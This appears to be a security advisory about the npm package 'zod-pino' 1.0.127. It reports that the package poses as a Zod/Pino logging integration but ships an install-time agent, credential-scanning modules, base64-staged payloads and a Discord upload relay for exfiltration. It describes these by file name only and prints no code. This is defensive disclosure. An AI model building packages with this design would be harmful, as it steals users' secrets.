zod-pino @1.0.127

Summary

The package is published under a name suggesting a Pino logger integration for Zod, but the tarball contents do not match that purpose and exhibit multiple installer-harm fingerprints: - scripts/postinstall-agent.mjs runs at install time and performs outbound network activity (GET requests, ping/host probing, identifier collection). A logging-schema package has no legitimate reason to ship a postinstall agent that beacons out. - dist/discordRelayUpload.js implements POST-based upload flows with base64 encoding/decoding of payloads and host-reachability probes (ping) — a Discord-channel relay used for off-host data delivery, unrelated to the package's advertised purpose. - dist/secretScan/contentScanner.js and dist/secretScan/agentStartupAudit.js implement a secret-scanning routine that fetches huggingface.co endpoints from an 'agent startup audit' code path, with base64 buffer handling consistent with credential extraction and transmission. - dist/hfCredentials.js handles base64-encoded Hugging Face credentials, and dist/deploymentDefaults.js plus scripts/encode-deployment.mjs perform multi-stage base64 decoding of deployment payloads — typical staged-payload obfuscation. - dist/relayServer.js bundles a long-lived relay/server component with repeated host-probe (ping) primitives. Taken together — install-time agent with outbound traffic, secret-scanning + credential modules, base64-staged deployment payloads, and a Discord upload relay, all in a package nominally advertised as a zod/pino integration — the shipped behavior matches an exfiltration/relay toolchain rather than a logging utility. Installing this package triggers the postinstall agent automatically.

Source: amazon-inspector (c536e5a7ee3d5542e1ac822b30ba4525e52b2ae0c964d0c2470468d91b9b41c8)